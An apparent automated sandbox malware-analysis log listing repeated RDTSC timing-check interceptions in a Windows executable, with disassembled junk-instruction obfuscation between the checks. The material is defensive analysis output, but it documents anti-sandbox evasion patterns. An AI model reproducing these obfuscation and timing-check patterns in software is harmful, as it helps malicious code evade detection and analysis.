Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C17F76 second address: C17F7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C17F7A second address: C17F86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C17F86 second address: C17F8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C17F8A second address: C17F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C17F92 second address: C17FA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA3F4E9719Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C17FA0 second address: C17FCE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4513F38h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA3F4513F2Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C20263 second address: C20269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C20269 second address: C20290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 js 00007FA3F4513F28h 0x0000000d push edi 0x0000000e pop edi 0x0000000f popad 0x00000010 push esi 0x00000011 jmp 00007FA3F4513F33h 0x00000016 push edi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C33267 second address: C3327E instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA3F4E97198h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jl 00007FA3F4E9719Eh 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C3327E second address: C33286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C33286 second address: C3328C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C3328C second address: C33290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C3672E second address: C36747 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FA3F4E971A3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C36747 second address: C3675B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FA3F4513F2Ch 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C3675B second address: C3675F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C4C982 second address: C4C9A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FA3F4513F26h 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FA3F4513F35h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C4C9A4 second address: C4C9FD instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA3F4E971AEh 0x00000008 jno 00007FA3F4E97196h 0x0000000e jmp 00007FA3F4E971A2h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 js 00007FA3F4E971AEh 0x0000001d pushad 0x0000001e popad 0x0000001f jmp 00007FA3F4E971A6h 0x00000024 push edx 0x00000025 jmp 00007FA3F4E971A5h 0x0000002a pop edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C4C9FD second address: C4CA15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA3F4513F2Dh 0x00000008 jne 00007FA3F4513F26h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C4BC26 second address: C4BC31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FA3F4E97196h 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C4BC31 second address: C4BC37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C4BC37 second address: C4BC41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FA3F4E97196h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C4BD77 second address: C4BD7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C4BD7B second address: C4BD7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C4BD7F second address: C4BD8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C50C7A second address: C50C7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C50CFA second address: C50CFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C50CFE second address: C50D0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C50D0B second address: C50D0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C50D0F second address: C50D18 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C50F61 second address: C50F65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C50F65 second address: C50F6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: C50F6B second address: C50F70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6C7A3 second address: B6C7C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007FA3F4E971A0h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6CA24 second address: B6CA28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6CA28 second address: B6CA2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6CBC1 second address: B6CBC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6CBC5 second address: B6CBC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6CBC9 second address: B6CBDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b jnc 00007FA3F4513F26h 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CB0740 second address: 4CB0755 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA3F4E971A1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CB0755 second address: 4CB077C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4513F31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA3F4513F2Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CB077C second address: 4CB07C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4E971A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop edx 0x0000000f pushfd 0x00000010 jmp 00007FA3F4E971A6h 0x00000015 adc si, 4538h 0x0000001a jmp 00007FA3F4E9719Bh 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CB07C0 second address: 4CB084C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA3F4513F2Fh 0x00000009 adc esi, 78DFAAFEh 0x0000000f jmp 00007FA3F4513F39h 0x00000014 popfd 0x00000015 mov ch, 6Bh 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ecx 0x0000001b jmp 00007FA3F4513F33h 0x00000020 xchg eax, esi 0x00000021 pushad 0x00000022 mov edi, eax 0x00000024 pushad 0x00000025 pushad 0x00000026 popad 0x00000027 call 00007FA3F4513F2Ch 0x0000002c pop esi 0x0000002d popad 0x0000002e popad 0x0000002f push eax 0x00000030 jmp 00007FA3F4513F30h 0x00000035 xchg eax, esi 0x00000036 jmp 00007FA3F4513F30h 0x0000003b lea eax, dword ptr [ebp-04h] 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CB084C second address: 4CB0865 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FA3F4E971A3h 0x00000009 pop ecx 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CB0865 second address: 4CB0886 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edx 0x00000005 jmp 00007FA3F4513F30h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 mov esi, 0E27C463h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CB0886 second address: 4CB08D8 instructions: 0x00000000 rdtsc 0x00000002 mov ax, 43BFh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushfd 0x00000009 jmp 00007FA3F4E971A4h 0x0000000e and esi, 4D82AAA8h 0x00000014 jmp 00007FA3F4E9719Bh 0x00000019 popfd 0x0000001a popad 0x0000001b push eax 0x0000001c pushad 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushfd 0x00000022 jmp 00007FA3F4E9719Ch 0x00000027 add ch, 00000008h 0x0000002a jmp 00007FA3F4E9719Bh 0x0000002f popfd 0x00000030 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CB08D8 second address: 4CB08F8 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 pushad 0x00000009 mov bx, si 0x0000000c jmp 00007FA3F4513F2Ch 0x00000011 popad 0x00000012 push dword ptr [ebp+08h] 0x00000015 pushad 0x00000016 push esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CB099D second address: 4CB09A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CB09A2 second address: 4CA005F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cl, dh 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a jmp 00007FA3F4513F2Ch 0x0000000f leave 0x00000010 pushad 0x00000011 mov edx, ecx 0x00000013 mov ecx, 628D8989h 0x00000018 popad 0x00000019 retn 0004h 0x0000001c nop 0x0000001d sub esp, 04h 0x00000020 xor ebx, ebx 0x00000022 cmp eax, 00000000h 0x00000025 je 00007FA3F4514083h 0x0000002b mov dword ptr [esp], 0000000Dh 0x00000032 call 00007FA3F881BB41h 0x00000037 mov edi, edi 0x00000039 jmp 00007FA3F4513F2Eh 0x0000003e xchg eax, ebp 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 pushfd 0x00000043 jmp 00007FA3F4513F2Dh 0x00000048 sub al, 00000066h 0x0000004b jmp 00007FA3F4513F31h 0x00000050 popfd 0x00000051 pushfd 0x00000052 jmp 00007FA3F4513F30h 0x00000057 jmp 00007FA3F4513F35h 0x0000005c popfd 0x0000005d popad 0x0000005e rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA005F second address: 4CA007A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4E971A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov dl, 84h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA007A second address: 4CA00A1 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 mov cx, dx 0x0000000c call 00007FA3F4513F39h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA00A1 second address: 4CA00EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov ebp, esp 0x00000008 pushad 0x00000009 push edx 0x0000000a mov di, si 0x0000000d pop eax 0x0000000e pushfd 0x0000000f jmp 00007FA3F4E9719Bh 0x00000014 xor ecx, 676C14BEh 0x0000001a jmp 00007FA3F4E971A9h 0x0000001f popfd 0x00000020 popad 0x00000021 sub esp, 2Ch 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FA3F4E9719Dh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA00EE second address: 4CA0149 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA3F4513F37h 0x00000009 xor cx, AF7Eh 0x0000000e jmp 00007FA3F4513F39h 0x00000013 popfd 0x00000014 mov edi, esi 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebx 0x0000001a jmp 00007FA3F4513F2Ah 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FA3F4513F2Eh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA0149 second address: 4CA014E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA014E second address: 4CA0154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA01E3 second address: 4CA01F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA3F4E971A1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA01F8 second address: 4CA01FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA01FC second address: 4CA0224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA3F4E971A9h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA0224 second address: 4CA022A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA022A second address: 4CA022E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA022E second address: 4CA02F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, 00000000h 0x0000000d jmp 00007FA3F4513F34h 0x00000012 inc ebx 0x00000013 jmp 00007FA3F4513F30h 0x00000018 test al, al 0x0000001a pushad 0x0000001b mov eax, ebx 0x0000001d popad 0x0000001e je 00007FA3F45140E2h 0x00000024 pushad 0x00000025 call 00007FA3F4513F35h 0x0000002a pushfd 0x0000002b jmp 00007FA3F4513F30h 0x00000030 adc ch, FFFFFFD8h 0x00000033 jmp 00007FA3F4513F2Bh 0x00000038 popfd 0x00000039 pop esi 0x0000003a movsx ebx, cx 0x0000003d popad 0x0000003e lea ecx, dword ptr [ebp-14h] 0x00000041 pushad 0x00000042 jmp 00007FA3F4513F2Eh 0x00000047 pushad 0x00000048 pushad 0x00000049 popad 0x0000004a pushfd 0x0000004b jmp 00007FA3F4513F2Eh 0x00000050 and si, 6968h 0x00000055 jmp 00007FA3F4513F2Bh 0x0000005a popfd 0x0000005b popad 0x0000005c popad 0x0000005d mov dword ptr [ebp-14h], edi 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007FA3F4513F35h 0x00000067 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA037D second address: 4CA044B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FA3F4E971A7h 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test eax, eax 0x00000010 jmp 00007FA3F4E971A5h 0x00000015 jg 00007FA466B5526Eh 0x0000001b jmp 00007FA3F4E9719Eh 0x00000020 js 00007FA3F4E971F0h 0x00000026 jmp 00007FA3F4E971A0h 0x0000002b cmp dword ptr [ebp-14h], edi 0x0000002e pushad 0x0000002f mov cl, 0Ah 0x00000031 popad 0x00000032 jne 00007FA466B5524Ch 0x00000038 pushad 0x00000039 call 00007FA3F4E971A2h 0x0000003e pushfd 0x0000003f jmp 00007FA3F4E971A2h 0x00000044 or eax, 54A78F98h 0x0000004a jmp 00007FA3F4E9719Bh 0x0000004f popfd 0x00000050 pop esi 0x00000051 movsx ebx, si 0x00000054 popad 0x00000055 mov ebx, dword ptr [ebp+08h] 0x00000058 jmp 00007FA3F4E971A0h 0x0000005d lea eax, dword ptr [ebp-2Ch] 0x00000060 pushad 0x00000061 mov bx, si 0x00000064 push eax 0x00000065 pop eax 0x00000066 popad 0x00000067 push ebp 0x00000068 push eax 0x00000069 push edx 0x0000006a pushad 0x0000006b push eax 0x0000006c push edx 0x0000006d rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA044B second address: 4CA0453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, dx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA0453 second address: 4CA0459 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA0459 second address: 4CA045D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA045D second address: 4CA04C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4E9719Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], esi 0x0000000e jmp 00007FA3F4E971A0h 0x00000013 nop 0x00000014 jmp 00007FA3F4E971A0h 0x00000019 push eax 0x0000001a jmp 00007FA3F4E9719Bh 0x0000001f nop 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov cl, bh 0x00000025 pushfd 0x00000026 jmp 00007FA3F4E9719Ch 0x0000002b xor si, 3848h 0x00000030 jmp 00007FA3F4E9719Bh 0x00000035 popfd 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA04C6 second address: 4CA04CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA04CC second address: 4CA04D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA04D0 second address: 4CA04EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FA3F4513F2Fh 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA04EE second address: 4CA056A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA3F4E9719Fh 0x00000009 and si, 7FEEh 0x0000000e jmp 00007FA3F4E971A9h 0x00000013 popfd 0x00000014 mov bl, ch 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr [esp], ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f call 00007FA3F4E971A4h 0x00000024 pop eax 0x00000025 pushfd 0x00000026 jmp 00007FA3F4E9719Bh 0x0000002b or al, FFFFFFAEh 0x0000002e jmp 00007FA3F4E971A9h 0x00000033 popfd 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA0596 second address: 4CA059A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA059A second address: 4CA05A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA05A0 second address: 4CA05D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4513F34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA3F4513F37h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA05D3 second address: 4CA05D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA05D9 second address: 4C90BA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FA4661D1F9Ah 0x0000000e xor eax, eax 0x00000010 jmp 00007FA3F44ED65Ah 0x00000015 pop esi 0x00000016 pop edi 0x00000017 pop ebx 0x00000018 leave 0x00000019 retn 0004h 0x0000001c nop 0x0000001d sub esp, 04h 0x00000020 mov esi, eax 0x00000022 xor ebx, ebx 0x00000024 cmp esi, 00000000h 0x00000027 je 00007FA3F4514060h 0x0000002d call 00007FA3F880C56Ah 0x00000032 mov edi, edi 0x00000034 jmp 00007FA3F4513F2Eh 0x00000039 xchg eax, ebp 0x0000003a pushad 0x0000003b mov ax, 8B5Dh 0x0000003f jmp 00007FA3F4513F2Ah 0x00000044 popad 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4C90BA1 second address: 4C90BA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
